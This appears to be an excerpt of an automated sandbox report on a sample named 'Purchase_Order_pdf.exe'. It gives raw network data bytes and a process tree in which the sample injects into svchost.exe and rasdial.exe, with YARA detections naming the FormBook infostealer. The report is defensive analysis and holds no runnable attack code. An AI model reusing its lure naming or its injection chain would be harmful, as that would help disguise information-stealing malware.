                                                                    Data Raw: 76 78 50 44 3d 70 54 4d 31 7a 65 52 32 53 6a 69 70 62 56 70 63 76 2f 43 66 49 5a 58 42 31 70 78 73 2b 72 79 49 33 71 75 68 39 75 50 71 4b 31 64 70 70 44 6e 53 4f 6e 31 50 4c 4d 43 6b 56 6f 78 72 56 41 44 32 6a 77 72 6f 4d 58 34 35 48 6e 32 37 50 30 4c 4b 32 4b 2f 37 39 69 62 70 57 73 35 65 4e 2f 4a 67 44 78 45 61 4b 65 58 34 78 71 45 54 36 74 46 76 46 61 6a 50 4f 79 76 46 39 6e 72 52 61 61 38 79 79 56 71 36 54 59 45 4a 4b 2b 7a 75 36 65 4d 67 35 4d 72 33 75 7a 37 53 63 63 56 53 71 35 4a 41 46 72 61 38 76 49 74 70 4f 43 78 34 52 50 39 59 42 72 71 78 6d 47 55 5a 50 63 67 34 72 38 78 50 6d 35 32 62 76 4b 67 4b 5a 67 30 75 30 30 54 67 53 59 79 62 37 32 35 73 4a 69 4d 43
                                                                    Data Ascii: vxPD=pTM1zeR2SjipbVpcv/CfIZXB1pxs+ryI3quh9uPqK1dppDnSOn1PLMCkVoxrVAD2jwroMX45Hn27P0LK2K/79ibpWs5eN/JgDxEaKeX4xqET6tFvFajPOyvF9nrRaa8yyVq6TYEJK+zu6eMg5Mr3uz7SccVSq5JAFra8vItpOCx4RP9YBrqxmGUZPcg4r8xPm52bvKgKZg0u00TgSYyb725sJiMC
                                                                    Oct 30, 2024 04:59:23.993429899 CET | 1236 | IN | HTTP/1.1 404
                                                                    Server: ZGS
                                                                    Date: Wed, 30 Oct 2024 03:59:23 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: zalb_8ae64e9492=cd858cf068bec389eea549b00143a3a9; Path=/
                                                                    Set-Cookie: csrfc=af26ecaa-39f6-4ade-8038-a59a6d21dc2f;path=/;priority=high
                                                                    Set-Cookie: _zcsr_tmp=af26ecaa-39f6-4ade-8038-a59a6d21dc2f;path=/;SameSite=Strict;priority=high
                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                    vary: accept-encoding
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                    Data Ascii: 575X[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                                    Oct 30, 2024 04:59:23.993485928 CET | 729 | IN | Data Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                    Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                                                    Target ID:0
                                                                    Start time:23:55:15
                                                                    Start date:29/10/2024
                                                                    Path:C:\Users\user\Desktop\Purchase_Order_pdf.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Purchase_Order_pdf.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'327'231 bytes
                                                                    MD5 hash:0E51B97A594AA2F1756261A47A695484
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:23:55:17
                                                                    Start date:29/10/2024
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Purchase_Order_pdf.exe"
                                                                    Imagebase:0x9b0000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:23:55:47
                                                                    Start date:29/10/2024
                                                                    Path:C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe"
                                                                    Imagebase:0xae0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:5
                                                                    Start time:23:55:49
                                                                    Start date:29/10/2024
                                                                    Path:C:\Windows\SysWOW64\rasdial.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                                                    Imagebase:0xf00000
                                                                    File size:19'456 bytes
                                                                    MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:7
                                                                    Start time:23:56:02
                                                                    Start date:29/10/2024
                                                                    Path:C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe"
                                                                    Imagebase:0xae0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:23:56:14
                                                                    Start date:29/10/2024
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff79f9e0000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    No disassembly